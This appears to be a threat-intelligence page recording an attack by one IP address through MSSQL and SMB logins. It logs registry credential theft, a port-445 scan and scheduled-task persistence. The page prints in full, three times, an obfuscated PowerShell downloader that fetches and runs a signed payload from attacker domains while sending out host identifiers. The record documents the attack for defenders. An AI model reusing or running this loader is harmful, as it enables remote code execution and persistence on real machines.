IP Address: 111.254.60.45 - Previously Malicious
This IP address attempted an attack on a machine in our threat sensors network
Role | Attacker, Scanner
Services Targeted | MSSQL, SMB
Tags | Execute MsSql Shell Command, Service Start, Unauthorized Credential Access, Successful SMB Login, MSSQL, SMB Share Connect, SMB File Operation By CMD, Scheduled Task Creation, Successful MSSQL Login, PowerShell, CMD
Associated Attack Servers | -
IP Address | 111.254.60.45
Domain | -
ISP | HiNet
Country | Taiwan, Province of China
WHOIS Created Date | -
WHOIS Updated Date | -
Organization | -
First seen in Akamai Guardicore Segmentation | 2021-05-24
Last seen in Akamai Guardicore Segmentation | 2021-05-24
A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: White List |
Successful MSSQL Login |
A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts |
Successful SMB Login |
MSSQL executed 2 shell commands |
Execute MsSql Shell Command |
A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: Previously Approved User 3 times |
Successful MSSQL Login |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com |
DNS Query, Access Suspicious Domain, Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80 |
Outgoing Connection |
The command line blackball was scheduled to run by modifying C:\Windows\System32\Tasks\blackball |
|
The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Y65I2GFrmR7 |
|
Service msiserver was started |
Service Start |
PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe 2 times |
|
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: d.u78wjdu.com |
DNS Query, Access Suspicious Domain, Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.251.24:80, 192.168.0.0:445, 192.168.0.10:445, 192.168.0.11:445, 192.168.0.12:445, 192.168.0.13:445, 192.168.0.14:445, 192.168.0.15:445, 192.168.0.16:445, 192.168.0.17:445, 192.168.0.18:445, 192.168.0.19:445, 192.168.0.1:445, 192.168.0.20:445, 192.168.0.21:445, 192.168.0.22:445, 192.168.0.23:445, 192.168.0.24:445, 192.168.0.25:445, 192.168.0.26:445, 192.168.0.27:445, 192.168.0.28:445, 192.168.0.29:445, 192.168.0.2:445, 192.168.0.30:445, 192.168.0.31:445, 192.168.0.32:445, 192.168.0.33:445, 192.168.0.34:445, 192.168.0.35:445, 192.168.0.36:445, 192.168.0.37:445, 192.168.0.38:445, 192.168.0.39:445, 192.168.0.3:445, 192.168.0.40:445, 192.168.0.41:445, 192.168.0.42:445, 192.168.0.43:445, 192.168.0.44:445, 192.168.0.45:445, 192.168.0.46:445, 192.168.0.47:445, 192.168.0.48:445, 192.168.0.49:445, 192.168.0.4:445, 192.168.0.50:445, 192.168.0.51:445, 192.168.0.52:445, 192.168.0.53:445, 192.168.0.54:445, 192.168.0.55:445, 192.168.0.56:445, 192.168.0.57:445, 192.168.0.58:445, 192.168.0.59:445, 192.168.0.5:445, 192.168.0.60:445, 192.168.0.61:445, 192.168.0.62:445, 192.168.0.63:445, 192.168.0.64:445, 192.168.0.65:445, 192.168.0.66:445, 192.168.0.67:445, 192.168.0.68:445, 192.168.0.69:445, 192.168.0.6:445, 192.168.0.70:445, 192.168.0.71:445, 192.168.0.72:445, 192.168.0.73:445, 192.168.0.74:445, 192.168.0.75:445, 192.168.0.76:445, 192.168.0.77:445, 192.168.0.78:445, 192.168.0.79:445, 192.168.0.7:445, 192.168.0.80:445, 192.168.0.81:445, 192.168.0.82:445, 192.168.0.83:445, 192.168.0.84:445, 192.168.0.85:445, 192.168.0.86:445, 192.168.0.87:445, 192.168.0.8:445, 192.168.0.9:445 and 54.225.222.160:443 |
Outgoing Connection |
The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zke'+'r9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\C2jb0ZVDuPs\6mnCxpb4 |
|
The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\olBv8pfZ3X\1JvNPpZEKa |
|
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zz3r0.com |
DNS Query, Access Suspicious Domain |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com |
DNS Query, Access Suspicious Domain, Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80 |
Outgoing Connection |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zker9.com |
DNS Query, Access Suspicious Domain |
c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to extract credentials from Windows Registry 69 times |
Unauthorized Credential Access |
Process netsvcs Service Group started listening on ports: 65529 |
Listening |
Process c:\windows\system32\ipconfig.exe attempted to access suspicious domains: d.u78wjdu.com, t.bb3u9.com, t.zker9.com and t.zz3r0.com |
DNS Query, Access Suspicious Domain |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access domains: api.ipify.org and ctldl.windowsupdate.com |
DNS Query |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe scanned port 445 on 88 IP Addresses |
Port 445 Scan |
Connection was closed due to timeout |
|